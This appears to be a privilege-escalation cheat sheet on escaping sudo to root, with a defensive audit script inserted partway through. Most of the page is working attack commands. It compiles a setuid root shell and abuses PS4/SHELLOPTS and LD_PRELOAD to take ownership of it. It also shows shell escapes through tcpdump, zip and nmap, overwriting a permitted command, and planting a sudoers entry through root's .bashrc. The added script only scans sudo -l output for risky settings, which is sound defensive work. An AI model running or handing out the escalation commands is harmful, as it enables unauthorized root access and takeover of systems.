Escaping sudo

First check which commands you are allowed to run and what environment limitations apply with sudo -l. Then check the permissions on the files you are allowed to run and on the folders that contain them. If you can modify the file, you already know what to do. If the folder is wide open, remove the file and create a link from its name to your code. If the environment is inherited from the user, set PS4, LD_PRELOAD, PERL5OPT, PYTHONINSPECT, etc.

echo -e '#include <unistd.h>\nint main() { setgid(0); setuid(0); execl("/bin/sh","sh",(char *)0); }' | gcc -x c -o egg -
setenv SHELLOPTS xtrace
setenv PS4 '$(chown 0:0 egg)'
sudo ./command
setenv PS4 '$(chmod +xs egg)'
sudo ./command
./egg

LD_PRELOAD

echo -e '#include <unistd.h>\nint main() { setgid(0); setuid(0); execl("/bin/sh","sh",(char *)0); }' | gcc -x c -o /tmp/egg -
echo -e '#include <unistd.h>\n#include <stdio.h>\n#include <sys/types.h>\n#include <stdlib.h>\nvoid _init(){ if (!geteuid()) { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); execl("/bin/sh","sh","-c","chown 0:0 /tmp/egg; /bin/chmod +xs /tmp/egg",NULL); }}' | gcc -x c -fPIC -c -o preloader.o -

gcc -shared -Wl,-soname,libno_ex.so.1 -o /tmp/libno_ex.so.1.0 preloader.o -nostartfiles
sudo LD_PRELOAD=/tmp/libno_ex.so.1.0 command
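As a defender's counterpart to the sudo -l checks described at the top of the page and to the sudo LD_PRELOAD=... invocation above (which only works when sudoers grants setenv/SETENV), here is an added audit script that is not part of the original page: it scans the text of sudo -l for an inherited or settable environment, env_keep entries for the variables the page names, and permitted commands sitting in world-writable locations. The sample sudo -l output is constructed, and the world-writable/sticky-bit heuristic is my own.

```shell
#!/bin/sh
# Example audit helper (added here, not from the original page): scans the text
# of `sudo -l` for the conditions the techniques above depend on. Nothing runs sudo.
set -f   # no pathname expansion when sudoers lines containing '*' are split
# Variables the page names plus BASH_ENV and LD_LIBRARY_PATH, abused the same way.
RISKY_VARS='LD_PRELOAD LD_LIBRARY_PATH PS4 SHELLOPTS PERL5OPT PYTHONINSPECT BASH_ENV'
finding() { echo "FINDING: $1"; SUDO_FINDINGS=$((SUDO_FINDINGS + 1)); }
# check_path FILE: a permitted command anyone can replace, either directly
# (world-writable file) or by relinking it inside a world-writable, non-sticky dir.
check_path() {
    [ -e "$1" ] || return 0
    case "$(ls -ld "$1" | cut -c1-10)" in
    ????????w?) finding "$1 is world-writable" ;;
    esac
    dir=$(dirname "$1")
    case "$(ls -ld "$dir" | cut -c1-10)" in    # drwxrwxrwt (sticky) is fine
    ????????w[x-]) finding "$dir is world-writable and not sticky: $1 can be replaced" ;;
    esac
}
# audit_sudo_l TEXT: prints one FINDING per risky item, counts them in
# SUDO_FINDINGS and returns 1 if there were any.
audit_sudo_l() {
    SUDO_FINDINGS=0
    while IFS= read -r line; do
        case "$line" in *'!env_reset'*) finding "env_reset disabled: caller's environment is inherited" ;; esac
        case "$line" in *'!setenv'*) ;; *setenv*|*SETENV:*) finding "setenv/SETENV permits 'sudo VAR=value command'" ;; esac
        case "$line" in *env_keep*)
            for v in $RISKY_VARS; do
                case "$line" in *"$v"*) finding "env_keep preserves $v" ;; esac
            done ;;
        esac
        case "$line" in *'('*')'*)    # e.g. "(root) NOPASSWD: /usr/sbin/tcpdump, /usr/bin/zip"
            for word in ${line#*)}; do
                case "$word" in /*) check_path "${word%,}" ;; esac
            done ;;
        esac
    done <<EOF
$1
EOF
    [ "$SUDO_FINDINGS" -eq 0 ]
}
# Constructed sample output for a badly configured host (not a real system).
SAMPLE='Matching Defaults entries for alice on host01:
    !env_reset, env_keep+="LD_PRELOAD PS4 SHELLOPTS", setenv
User alice may run the following commands on host01:
    (root) NOPASSWD: /usr/sbin/tcpdump, /usr/bin/zip
    (root) SETENV: /usr/bin/nmap'
audit_sudo_l "$SAMPLE" || echo "$SUDO_FINDINGS risky setting(s) found"
```

Feed it the real output with audit_sudo_l "$(sudo -l)"; every FINDING maps to a sudoers change (keep env_reset, drop the env_keep entry or the setenv grant) or to a permissions fix on the command or its directory.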

Otherwise look for running a custom script from the allowed command. Examples:

tcpdump

sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z shell.sh -Z root

zip

zip -U in.zip -O out.zip -T -TT '/bin/bash #'

nmap

echo "os.execute('/bin/sh')" > shell.lua
sudo /usr/bin/nmap --script shell.lua

Look for interactive commands and see if you can escape from them (! calls a shell from vi or less) or overwrite/change them. For example, you can use the --interactive option in older versions of nmap.

Another option is to use the command's file output to overwrite the command itself with a custom script. Back up first, run the shell, and clean up afterwards:

cp command /tmp/command.bak
sudo command -log command "; /bin/bash; cat /tmp/command.bak > command"

The last option is to look for an option that writes to a file. Symlink that file to root's .bashrc, add a command that gets you root, and wait for root to log in:

"$(echo -e "\necho 'me ALL=(ALL) ALL' > /etc/sudoers.d/getroot ")"

Tags: PrivEsc